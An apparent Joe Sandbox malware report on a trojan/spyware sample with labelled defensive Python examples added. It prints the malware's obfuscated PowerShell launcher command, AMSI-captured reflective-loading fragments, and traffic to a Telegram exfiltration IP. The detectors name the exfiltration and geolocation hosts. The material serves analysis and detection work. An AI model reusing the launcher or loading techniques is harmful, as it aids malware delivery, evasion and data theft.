            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49875
            Source: unknown | Network traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknown | Network traffic detected: HTTP traffic on port 49899 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49905
            Source: unknown | Network traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknown | Network traffic detected: HTTP traffic on port 49905 -> 443
            Source: unknown | HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49770 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49781 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49905 version: TLS 1.2
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Code function: 0_2_00404F90 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, | 0_2_00404F90
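            The memory strings and connections above all belong to one process, msiexec.exe: it fetches a stage from drive.usercontent.google.com, geolocates the analysis host through reallyfreegeoip.org/xml/<ip>, and then opens a TLS session to 149.154.167.220, which the report's overview attributes to the Telegram API. The detection below is an added example, not part of the Joe Sandbox report and not the malware's code. It correlates per-process network events and flags three things the report shows: a Windows installer binary opening its own outbound sessions, a geolocation lookup followed shortly by a Telegram contact from the same process, and requests sent without a User-Agent (also flagged in the report's overview). The events are constructed, the api.telegram.org hostname for 149.154.167.220 is an assumption (the report lists only the IP), and the browser exemption list is an assumption for the sample environment.

```python
"""Per-process network correlation for the Snake Keylogger pattern in this report.

Added example: not part of the Joe Sandbox report and not the malware's code.
Events are CONSTRUCTED to mirror the report; the api.telegram.org host for the
149.154.167.220 connection is an assumption (the report lists only the IP).
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class NetEvent:
    ts: int                     # seconds from start of capture (constructed)
    process: str
    host: str
    user_agent: Optional[str]   # None when the request carried no User-Agent


# Hosts taken from the report's memory strings / HTTPS connections.
GEOIP_HOSTS = {"reallyfreegeoip.org"}
EXFIL_HOSTS = {"api.telegram.org"}   # assumed host behind 149.154.167.220
# Windows binaries that have no reason to open their own internet sessions;
# the report shows msiexec.exe used as the injected host process. Note that
# msiexec.exe can legitimately fetch an MSI from a URL given on its command
# line, so tune this per environment.
LOLBIN_PROCESSES = {"msiexec.exe"}
# Processes for which a missing User-Agent is not by itself suspicious (assumption).
UA_EXEMPT = {"chrome.exe", "msedge.exe", "firefox.exe"}

Alert = Tuple[str, str, str]   # (rule, process, detail)


def detect(events: List[NetEvent], window_s: int = 300) -> List[Alert]:
    """Return alerts for the LOLBin / geolocation-then-exfil / no-UA patterns."""
    alerts: List[Alert] = []
    by_proc: Dict[str, List[NetEvent]] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        proc = ev.process.lower()
        by_proc.setdefault(proc, []).append(ev)
        if proc in LOLBIN_PROCESSES:
            alerts.append(("lolbin_outbound", ev.process, ev.host))
        if ev.user_agent is None and proc not in UA_EXEMPT:
            alerts.append(("no_user_agent", ev.process, ev.host))
    # Sequence rule: a geolocation lookup followed by an exfil host within
    # window_s seconds, from the same process, is the victim-profiling step
    # that precedes the first Telegram message.
    for evs in by_proc.values():
        geo_ts = [e.ts for e in evs if e.host in GEOIP_HOSTS]
        for ev in evs:
            if ev.host in EXFIL_HOSTS and any(0 <= ev.ts - t <= window_s for t in geo_ts):
                alerts.append(("geoip_then_exfil", ev.process,
                               f"{ev.host} within {window_s}s of geolocation lookup"))
                break
    return alerts


# CONSTRUCTED events in the order the report implies.
SAMPLE_EVENTS = [
    NetEvent(0, "msiexec.exe", "drive.usercontent.google.com", None),
    NetEvent(12, "msiexec.exe", "reallyfreegeoip.org", None),
    NetEvent(15, "msiexec.exe", "api.telegram.org", None),
    NetEvent(20, "chrome.exe", "www.google.com", "Mozilla/5.0 (constructed)"),
]

if __name__ == "__main__":
    for rule, proc, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:18} {proc:14} {detail}")
```

            The sequence rule is the one worth keeping when the hostnames rotate: the geolocation-then-exfil ordering is a property of the stealer's startup, not of any particular service, so swapping in another free geoip API or another messaging API only changes the two host sets.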

            System Summary

            Source: initial sample | Static PE information: Filename: Balance Pendiente.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Code function: 0_2_004030B8 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, | 0_2_004030B8
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Code function: 0_2_00406141 | 0_2_00406141
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Code function: 0_2_004047CF | 0_2_004047CF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_06FFBED6 | 1_2_06FFBED6
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02EDD278 | 6_2_02EDD278
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02ED538A | 6_2_02ED538A
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02EDC147 | 6_2_02EDC147
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02EDC752 | 6_2_02EDC752
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02EDC468 | 6_2_02EDC468
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02EDCA22 | 6_2_02EDCA22
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02EDE988 | 6_2_02EDE988
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02ED3E17 | 6_2_02ED3E17
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02EDCFC2 | 6_2_02EDCFC2
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02EDCCF2 | 6_2_02EDCCF2
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02ED7118 | 6_2_02ED7118
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02ED2A77 | 6_2_02ED2A77
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02EDF974 | 6_2_02EDF974
            Source: Balance Pendiente.exe | Static PE information: invalid certificate
            Source: Balance Pendiente.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/15@5/5
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Code function: 0_2_00404293 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, | 0_2_00404293
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar, | 0_2_00402036
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | File created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84
            Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | File created: C:\Users\user\AppData\Local\Temp\nsr1481.tmp
            Source: Balance Pendiente.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Balance Pendiente.exe | Virustotal: Detection: 44%
            Source: Balance Pendiente.exe | ReversingLabs: Detection: 37%
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | File read: C:\Users\user\Desktop\Balance Pendiente.exe
            Source: unknown | Process created: C:\Users\user\Desktop\Balance Pendiente.exe "C:\Users\user\Desktop\Balance Pendiente.exe"
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
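            The PowerShell command line in the process tree above is the whole loader stage: it reads the dropped Crossbeam.Dec122 with gc -Raw, cuts the three characters at offset 60335 out of that text to use as a command name, and invokes that command with the entire file content as its argument, so Invoke-Expression never appears on the command line and the script body never touches the command line at all. The Python helper below is an added example for triaging that launcher; it is not part of the Joe Sandbox report and not the malware's code. It parses the launcher shape out of a command line, resolves the command name from the file at the given offset, and scans the file for the reflective API-resolution fragments that AMSI recorded for this sample further down (GetDelegateForFunctionPointer, DefineDynamicAssembly). The script body is constructed, because the real Crossbeam.Dec122 is not on the page: it plants iex at offset 60335, which is the alias published GuLoader analyses report for this substring trick, and that resolution is an assumption here.

```python
"""Triage helper for the GuLoader-style PowerShell launcher in this report.

Added example: not part of the Joe Sandbox report and not the malware's code.
REPORT_CMDLINE is copied from the report's process tree; the script body is
CONSTRUCTED because the dropped Crossbeam.Dec122 is not on the page.
"""
import re
from typing import Any, Dict, List, Optional

# Launcher shape:  $v=gc -Raw '<path>';$w=$v.SubString(<off>,<len>);.$w($v)
# i.e. read the whole file, take <len> characters at <off> as a command name,
# then run that command with the file content as its argument.
LAUNCHER_RE = re.compile(
    r"\$(?P<var>\w+)\s*=\s*gc\s+-Raw\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<alias>\w+)\s*=\s*\$(?P=var)\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)\s*;"
    r"\s*\.\$(?P=alias)\(\$(?P=var)\)",
    re.IGNORECASE,
)

# Fragments AMSI recorded for this sample (reflective Win32 API resolution).
REFLECTION_MARKERS = (
    "GetDelegateForFunctionPointer",
    "DefineDynamicAssembly",
    "DefineDynamicModule",
    "MulticastDelegate",
)

# Command names that make the launcher execute the file body as PowerShell.
INVOKERS = {"iex", "invoke-expression"}


def parse_launcher(cmdline: str) -> Optional[Dict[str, Any]]:
    """Extract script path, offset and length from a launcher command line."""
    m = LAUNCHER_RE.search(cmdline)
    if m is None:
        return None
    return {"path": m["path"], "offset": int(m["off"]), "length": int(m["len"])}


def resolve_invoker(script: str, offset: int, length: int) -> str:
    """Characters the launcher will use as the command name.

    PowerShell's SubString indexes UTF-16 code units; for an ASCII script
    body that equals the character index used here.
    """
    return script[offset:offset + length]


def reflection_markers(script: str) -> List[str]:
    """Which reflective-API-resolution fragments the script body contains."""
    return [marker for marker in REFLECTION_MARKERS if marker in script]


def triage(cmdline: str, script: str) -> Dict[str, Any]:
    """Combine command-line parsing with the on-disk script content."""
    info = parse_launcher(cmdline)
    if info is None:
        return {"matched": False}
    invoker = resolve_invoker(script, info["offset"], info["length"])
    return {
        "matched": True,
        **info,
        "invoker": invoker,
        "executes_file_body": invoker.lower() in INVOKERS,
        "reflection_markers": reflection_markers(script),
    }


# Command line exactly as it appears in the report's process tree.
REPORT_CMDLINE = (
    '"powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw '
    "'C:\\Users\\user\\AppData\\Roaming\\Kalkvrksarbejderen84\\chego"
    "\\reverensens\\Defmrkede\\Crossbeam.Dec122';"
    '$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"'
)


def build_constructed_script() -> str:
    """CONSTRUCTED stand-in for Crossbeam.Dec122 (assumption, not the real file):
    one filler line per AMSI marker, '#' padding, and 'iex' planted at 60335."""
    head = "\n".join(
        "# constructed stand-in line containing " + marker for marker in REFLECTION_MARKERS
    ) + "\n"
    return head.ljust(60335, "#") + "iex" + "\n# constructed trailer\n"


if __name__ == "__main__":
    print(triage(REPORT_CMDLINE, build_constructed_script()))
```

            In an incident the command line comes from process-creation telemetry and the script from the quarantined drop; the offset/length pair is the fingerprint to pivot on, since the variable names change per build while the SubString(<offset>,3) construct does not.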
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Section loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

            Data Obfuscation

            Source: Yara match | File source: 00000001.00000002.2174295669.000000000A3CE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Bortvejredes $Systemisable $Miljstttes), (Fiskeriterritoriets @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bagatelgrnse = [AppDomain]::CurrentDomain.Get
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Spiritualty)), $Kadaverdisciplins).DefineDynamicModule($Agribusiness, $false).DefineType($Auricyanic, $Tenuis, [System.MulticastDelega
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Code function: 0_2_00405E92 GetModuleHandleA,LoadLibraryA,GetProcAddress, | 0_2_00405E92
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_06FF98CF push 5F5E6BB2h; retn 0004h | 1_2_06FF98CA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_06FF880C push ss; retf | 1_2_06FF880D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_06FF4BDA push edx; retf | 1_2_06FF4BDB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_06FF4B7B push edx; retf | 1_2_06FF4B7C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_06FFAF5B pushad ; ret | 1_2_06FFAF71
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08EE28B9 push 8BD38B50h; iretd | 1_2_08EE28BE

            Persistence and Installation Behavior

            Source: Initial sample | Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) The email domain 'Tredjeprmier.Sh' is extremely suspicious - .sh is the Saint Helena country-code TLD and the domain name appears randomly generated. 2) Organization name 'Breweries' is generic and doesn't match a legitimate corporate entity. 3) The OU field contains seemingly random Danish/Germanic words that make no sense together. 4) Self-signed certificate where issuer matches subject exactly. 5) Certificate validation failed with untrusted root error. 6) Large time gap between compilation date (2013) and certificate dates (2024-2025) suggests possible timestamp manipulation. 7) The combination of a US location with Danish/Germanic organization details and a Saint Helena email domain creates an inconsistent and suspicious identity pattern typical of malware.
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | File created: C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
